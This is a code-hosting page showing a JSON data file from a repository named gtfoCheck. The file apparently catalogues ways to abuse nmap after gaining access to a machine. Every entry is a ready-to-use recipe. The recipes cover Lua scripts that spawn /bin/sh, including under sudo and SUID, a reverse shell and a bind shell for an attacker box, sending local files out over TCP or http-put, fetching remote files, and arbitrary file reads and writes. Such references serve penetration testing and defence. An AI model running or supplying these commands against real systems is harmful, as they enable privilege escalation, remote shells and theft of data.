Graham
/
gtfoCheck
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
master
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'master'
${ noResults }
gtfoCheck/data/nmap.json

83 lines
4.2 KiB
JSON
Raw Permalink Blame History

{
"functions": {
"shell": [
{
"description": "Input echo is disabled.",
"code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nnmap --script=$TF\n"
},
{
"description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.",
"code": "nmap --interactive\nnmap> !sh\n"
}
],
"non-interactive-reverse-shell": [
{
"description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
"code": "TF=$(mktemp)\necho 'local s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nwhile true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();' > $TF\nnmap --script=$TF\n"
}
],
"non-interactive-bind-shell": [
{
"description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
"code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nwhile true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();' > $TF\nnmap --script=$TF\n"
}
],
"file-upload": [
{
"description": "Send a local file via TCP. Run 'socat -v tcp-listen:8080,reuseaddr,fork -' on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
"code": "nmap -p [port] [host] --script http-put --script-args http-put.url=/,http-put.file=[file]\n"
},
{
"description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
"code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", 'rb')\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nt:send(d);\nt:close();' > $TF\nnmap --script=$TF\n"
}
],
"file-download": [
{
"description": "Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., 'php -S 0.0.0.0:8080'. Note that multiple connections are made to the server and the result is placed in '$TF/IP/PORT/PATH'. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
"code": "TF=$(mktemp -d)\nnmap -p [port] [host] --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=[file]\n"
},
{
"description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file.",
"code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"[file]\", \"wb\");\nf:write(d);\nio.close(f);' > $TF\nnmap --script=$TF\n"
}
],
"file-write": [
{
"code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"wb\"); f:write(\"[data]\"); io.close(f);' > $TF\nnmap --script=$TF\n"
},
{
"description": "The payload appears inside the regular nmap output.",
"code": "nmap -oG=[file] [data]\n"
}
],
"file-read": [
{
"code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);' > $TF\nnmap --script=$TF\n"
}
],
"sudo": [
{
"description": "Input echo is disabled.",
"code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nsudo nmap --script=$TF\n"
},
{
"description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.",
"code": "sudo nmap --interactive\nnmap> !sh\n"
}
],
"limited-suid": [
{
"description": "Input echo is disabled.",
"code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\n./nmap --script=$TF\n"
}
],
"suid": [
{
"description": "The payload appears inside the regular nmap output.",
"code": "./nmap -oG=[file] [data]\n"
}
]
}
}
Reference in New Issue View Git Blame Copy Permalink